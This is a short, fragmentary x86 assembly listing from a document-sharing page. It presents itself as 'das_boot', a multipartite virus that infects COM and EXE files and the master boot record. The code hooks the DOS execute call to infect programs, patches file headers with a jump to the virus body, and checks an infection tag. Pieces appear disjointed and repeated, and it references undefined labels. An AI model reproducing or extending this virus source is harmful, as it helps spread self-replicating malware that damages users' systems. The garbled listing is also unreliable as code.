Академический Документы
Профессиональный Документы
Культура Документы
; file: das_boot.a86
; description: _small virus modified into mulipartite com/exe infector
; thanks to: dark angel of phalcon/skism
;=============================================================================
das_boot:
call relative
infect_mbr:
push ds ;preserve registers
push es
push cs
pop ds ;set ds=cs
push cs
pop es ;set es=cs
push cs
pop ax ;set ax=cs
push cs
pop ds ;set ds=cs
push cs
pop es ;set es=cs
infectcom:
sub ax,03 ;subtract 3 from file pointer offset
mov byte ptr ds:[di],0e9 ;put "jmp" at start of target header
mov ds:[di+01],ax ;put jmp offset in target header
int21:
cmp ax,04b00 ;load and execute file request?
je infect ;if so, attempt to infect file
jmp short chain ;if not, jump to orig. int21 handler
infectexe:
cmp word ptr [di+010],exe_id ;check for infect tag in target sp
je go_already_infected ;if tag is present, don't infect
chain:
db 0ea ;"jmp far" to location specified in old21
heap:
old21 dw ?, ? ;offset and segment of orig. int21 handler
end das_boot